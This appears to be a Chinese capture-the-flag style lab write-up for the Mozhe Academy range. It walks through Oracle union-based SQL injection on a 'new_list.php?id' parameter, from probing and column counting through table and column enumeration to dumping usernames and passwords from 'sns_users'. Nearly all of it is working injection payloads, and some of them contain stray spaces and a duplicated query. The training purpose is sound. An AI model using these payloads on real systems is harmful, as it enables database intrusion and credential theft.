此次靶场地址为:墨者学院
一.跟其他数据库⼀样,检测注⼊点都是可以通过拼接and语句进⾏判断。这⾥通过and 1=1 和and 1=2进⾏判断。
new_list.php?id=1 and 1=1
new_list.php?id=1 and 1=2
二.通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断 当前字段数为2
new_list.php?id=1 order by 2
页面正常
new_list.php?id=1 order by 3
页面不正常说明当前字段为二
三.联合注入爆出回显点
new_list.php?id=-1 union select 'null','null' from dual
四.查询数据库版本信息..
new_list.php?id=-1 union select 'null',(select b anner from sys.v_$version where rownum=1) from dual
五.查询数据库表名,查询表名⼀般查询admin或者user表
第一张表
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
第二张表
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
第三张表
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_nam e not in 'LOGMNR_GLOBAL$') from dual
模糊搜索,获取表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
六.查询数据库列名...
第一个数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1) from dual
第二个数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME') from dual
第三个数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME') from dual
第四个数据库列名 没有了,说明就只有3个
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual
七.查询数据库数据获取账号密码的字段内容...
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong'
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
八.解密
